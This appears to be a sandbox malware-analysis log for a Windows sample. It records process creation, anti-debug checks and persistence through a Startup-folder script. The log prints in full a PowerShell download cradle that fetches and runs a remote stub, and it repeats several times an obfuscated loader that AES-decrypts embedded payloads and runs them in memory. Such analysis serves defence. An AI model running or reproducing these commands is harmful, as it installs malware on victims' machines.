Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: powershell.exe, 00000003.00000002.1765941531.000001D0F5B44000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\c.bat';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Network97287Man.cmd';$NHES='ErLgzntrLgzryrLgzPorLgzinrLgztrLgz'.Replace('rLgz', ''),'CHprLhHprLanHprLgeEHprLxtHprLensHprLionHprL'.Replace('HprL', ''),'CrvvlOevvlOavvlOtevvlODevvlOcrvvlOyvvlOptvvlOorvvlO'.Replace('vvlO', ''),'RemtKNamtKNdLmtKNinmtKNesmtKN'.Replace('mtKN', ''),'SptlAblittlAb'.Replace('tlAb', ''),'MaiShffnShffMoShffdShffulShffeShff'.Replace('Shff', ''),'GetKIgbCKIgburKIgbrKIgbenKIgbtPrKIgboKIgbceKIgbssKIgb'.Replace('KIgb', ''),'DecCIZVomCIZVprCIZVessCIZV'.Replace('CIZV', ''),'FrotqyzmBtqyzasetqyz6tqyz4Stqyztrtqyzitqyzngtqyz'.Replace('tqyz', ''),'ThZggrhZgganshZggfohZggrhZggmFhZgginahZgglBlhZggochZggkhZgg'.Replace('hZgg', ''),'InUneOvoUneOkeUneO'.Replace('UneO', ''),'ElLHtjemeLHtjntLHtjALHtjtLHtj'.Replace('LHtj', ''),'LoaKqbadKqba'.Replace('Kqba', ''),'CoqGYmpyqGYmToqGYm'.Replace('qGYm', '');powershell -w hidden;function fyfwL($itxzH){$CuCRJ=[System.Security.Cryptography.Aes]::Create();$CuCRJ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CuCRJ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CuCRJ.Key=[System.Convert]::($NHES[8])('gdCIwM8MuMxo7da/mrtCyIbOUmXu2FksViNDT/cHSz8=');$CuCRJ.IV=[System.Convert]::($NHES[8])('gcSSwI2zcUs6f9nNUiiZ/Q==');$kPfFB=$CuCRJ.($NHES[2])();$bvXzm=$kPfFB.($NHES[9])($itxzH,0,$itxzH.Length);$kPfFB.Dispose();$CuCRJ.Dispose();$bvXzm;}function RmDOY($itxzH){$dolaJ=New-Object System.IO.MemoryStream(,$itxzH);$wpdCQ=New-Object System.IO.MemoryStream;$MfuWs=New-Object System.IO.Compression.GZipStream($dolaJ,[IO.Compression.CompressionMode]::($NHES[7]));$MfuWs.($NHES[13])($wpdCQ);$MfuWs.Dispose();$dolaJ.Dispose();$wpdCQ.Dispose();$wpdCQ.ToArray();}$iiIRz=[System.IO.File]::($NHES[3])([Console]::Title);$bZoFj=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 5).Substring(2))));$NLfYF=RmDOY (fyfwL ([Convert]::($NHES[8])([System.Linq.Enumerable]::($NHES[11])($iiIRz, 6).Substring(2))));[System.Reflection.Assembly]::($NHES[12])([byte[]]$NLfYF).($NHES[0]).($NHES[10])($null,$null);[System.Reflection.Assembly]::($NHES[12])([byte[]]$bZoFj).($NHES[0]).($NHES[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /nobreak /t 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\c.bat';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\local\temp\c.bat';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\network97287man.cmd';$nhes='erlgzntrlgzryrlgzporlgzinrlgztrlgz'.replace('rlgz', ''),'chprlhhprlanhprlgeehprlxthprlenshprlionhprl'.replace('hprl', ''),'crvvloevvloavvlotevvlodevvlocrvvloyvvloptvvloorvvlo'.replace('vvlo', ''),'remtknamtkndlmtkninmtknesmtkn'.replace('mtkn', ''),'sptlablittlab'.replace('tlab', ''),'maishffnshffmoshffdshffulshffeshff'.replace('shff', ''),'getkigbckigburkigbrkigbenkigbtprkigbokigbcekigbsskigb'.replace('kigb', ''),'deccizvomcizvprcizvesscizv'.replace('cizv', ''),'frotqyzmbtqyzasetqyz6tqyz4stqyztrtqyzitqyzngtqyz'.replace('tqyz', ''),'thzggrhzgganshzggfohzggrhzggmfhzgginahzgglblhzggochzggkhzgg'.replace('hzgg', ''),'inuneovouneokeuneo'.replace('uneo', ''),'ellhtjemelhtjntlhtjalhtjtlhtj'.replace('lhtj', ''),'loakqbadkqba'.replace('kqba', ''),'coqgympyqgymtoqgym'.replace('qgym', '');powershell -w hidden;function fyfwl($itxzh){$cucrj=[system.security.cryptography.aes]::create();$cucrj.mode=[system.security.cryptography.ciphermode]::cbc;$cucrj.padding=[system.security.cryptography.paddingmode]::pkcs7;$cucrj.key=[system.convert]::($nhes[8])('gdciwm8mumxo7da/mrtcyiboumxu2fksvindt/chsz8=');$cucrj.iv=[system.convert]::($nhes[8])('gcsswi2zcus6f9nnuiiz/q==');$kpffb=$cucrj.($nhes[2])();$bvxzm=$kpffb.($nhes[9])($itxzh,0,$itxzh.length);$kpffb.dispose();$cucrj.dispose();$bvxzm;}function rmdoy($itxzh){$dolaj=new-object system.io.memorystream(,$itxzh);$wpdcq=new-object system.io.memorystream;$mfuws=new-object system.io.compression.gzipstream($dolaj,[io.compression.compressionmode]::($nhes[7]));$mfuws.($nhes[13])($wpdcq);$mfuws.dispose();$dolaj.dispose();$wpdcq.dispose();$wpdcq.toarray();}$iiirz=[system.io.file]::($nhes[3])([console]::title);$bzofj=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 5).substring(2))));$nlfyf=rmdoy (fyfwl ([convert]::($nhes[8])([system.linq.enumerable]::($nhes[11])($iiirz, 6).substring(2))));[system.reflection.assembly]::($nhes[12])([byte[]]$nlfyf).($nhes[0]).($nhes[10])($null,$null);[system.reflection.assembly]::($nhes[12])([byte[]]$bzofj).($nhes[0]).($nhes[10])($null,$null); "
